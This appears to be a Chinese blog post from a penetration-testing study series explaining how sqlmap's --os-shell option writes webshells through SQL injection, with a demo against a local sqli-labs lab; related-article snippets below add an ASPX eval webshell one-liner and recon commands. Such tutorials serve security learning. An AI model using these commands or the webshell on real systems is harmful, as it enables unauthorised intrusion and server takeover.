sqlmap的--os-shell

最新推荐文章于 2024-05-17 08:10:56 发布
最新推荐文章于 2024-05-17 08:10:56 发布
阅读量2.5k 收藏 6
点赞数
分类专栏: 渗透学习笔记 # 工具的基本使用 文章标签: php 开发语言 web安全 sql Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54037445/article/details/128693485
版权

一、常用语法

sqlmap -u 注入点 --os-shell

二、原理

    • 前提条件

1、sqlmap要提供的信息

(1)、已知网站的编程语言:PHP、JSP、ASP、ASPX;

(2)、已知网站的物理路径;

2、mysql本身的前提条件

(1)、用户具有root权限;

(2)、mysql中的secure_file_priv为空(意为任何路径下都可以写入);

2、实现流程

  1. 利用into outfile 向指定的网站的物理路径写入一个木马文件,该木马文件的编写语言为该网站的编程语言,这个木马文件的主要作用是可以上传一个用于执行命令的木马,并且对用于执行命令的木马进行赋权,使其具有读写执行权限;

  1. 利用刚才写入的文件,上传第二个用于执行命令的木马,这个木马就是最终用于get shell 的文件,与攻击者主机进行连接,提供shell窗口;

三、示例演示

    • 输入命令
Sqlmap -u http://192.168.162.156/sqli-labs/Less-1/?id=2 --os-shell
    • 选择网站编程语言
    • 输入网站的物理路径

(1)、询问你是否需要sqlmap去尝试网站的绝对路径,一般是尝试一些常用的绝对路径,如:'C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/'等,我们使用的是靶场,他爆破不到,所以选择n;

(2)、接下来选择自定义路径,输入网站的绝对路径,获取到shell

4、得到目标服务器的shell
5、查看服务器根网站,发现两个php木马文件

star-R
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap-master
06-23
5. **利用与提权**:如果数据库允许,SQLMap可以尝试利用特定的数据库漏洞进行权限提升,比如获取数据库服务器的shell访问权限。 6. **隐秘性**:为了不被检测到,SQLMap可以设置延迟时间、随机化HTTP头等参数,...
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u ..../sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 3744
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
sqlmapshell
goddemon
06-20 2504
sqlmap5种思路拿shell总结 ①利用dump 管理员类的账户后进入进行站点后拿shell 或者拿到账户后远程连接进行连接进行udf类提取类拿shell #连接方法 sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看 ②利用os-shellshell 条件①知绝对路径 ②管理员权限 ③开启 ③
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell(1)
最新发布
2401_84281594的博客
05-17 646
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell,网络安全面试题初级
2401_84103512的博客
04-04 807
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sqlmap (--os-shell)的使用
weixin_45815516的博客
01-01 414
以pikachu靶场字符型sql注入为例演示sqlmap中的--os-shell的用法
sqlmap --os-shell(写入木马获取getshell
NSQ0207的博客
09-06 1048
抓包,查看报错暴露出绝对路径。
sqlmapproject-sqlmap-0.9-3907-g9c22555
12-15
4. **权限提升**:如果目标系统存在弱权限设置,SQLMap可以尝试获取更高的数据库权限,例如通过执行系统命令(`os-shell`)或读取文件(`file-read`)。 5. **枚举与注入技术**:SQLMap支持多种注入技术,如布尔盲注、...
sqlmapproject-sqlmap-1.5-40-g4a12493.tar.gz
04-27
4. **权限升级**:利用`--os-pwn`或`--os-shell`等选项,尝试获得操作系统级别的访问权限,这在某些情况下可能可行。 5. **防御策略分析**:除了攻击,sqlmap还提供了`--tech`选项来识别目标防御策略,帮助我们了解...
第二十节 Sqlmap系统参数-01
09-15
使用--os-shell选项,Sqlmap可以执行系统命令,例如: ``` python sqlmap.py -u "注入点" --os-shell ``` 这将打开一个交互式shell,允许用户执行系统命令和控制目标系统。 二、Sqlmap结合Metasploit Sqlmap可以...
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1440
SQL注入上传一句话木马
sqlmap上传shell--dvwa演示】--sql注入常用语句
m0_63241485的博客
08-31 1661
sql上传shellsql常用语句,sqlmap常用语句
sqlmap注入点上传shell
kuxing100的专栏
08-14 3688
借鉴 http://www.2cto.com/Article/201206/138091.html   俺稍微改了一下 - = 凑合着用 反正我特么的拿到shell了.   记录开始.   sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell   [14:39:11] [IN
sqlmap 使用os-shell的必要条件
a519470764的专栏
06-13 8770
转载自:https://www.cnblogs.com/lcamry/p/5505110.htmlos-shell的使用通过上述的分析,我们知道了sqlmap os-shell参数的用法以及原理。很多的人会对os-shell的使用进行吐槽,这是得要多大的权限才能执行。是的,os-shell的执行条件有三个(1)网站必须是root权限(2)攻击者需要知道网站的绝对路径(3)GPC为off,php主动...
win环境下使用sqlmapshell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1007
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
关于--os-shellwebshell
qq_40806924的博客
07-30 2025
1.首先需要知道目录(web目录) 2.得是DBA权限 寻找web目录 dir C:\ /s /b | find “xLogin.aspx” 这里需要注意转义^ echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx' os-shell 无法执行的时候,权限低的时候可以尝试 sql-shellwebshell select
6-11CTF夺旗入门教程--命令注入
高冷的宅先生
05-05 496
1. 信息探测 #扫描主机服务信息以及服务版本 nmap -sV 192.168.2.113 #快速扫描主机全部信息 nmap -T4 -A -v 192.168.2.113 #探测敏感信息 nikto -host http://192.168.2.113 dirb http://192.168.2.113 2.深入挖掘 分析nmap、nikto扫描结果,分析挖掘可以利用的信息 查看http敏感页...
sqlmap --os-shell
03-16
sqlmap 是一款开源的 SQL 注入工具,它可以自动...选项 --os-shell 可以让 sqlmap 尝试利用 SQL 注入漏洞来获取操作系统级别的访问权限。使用这个选项需要目标系统中存在 SQL 注入漏洞并且需要您有权限使用这个工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值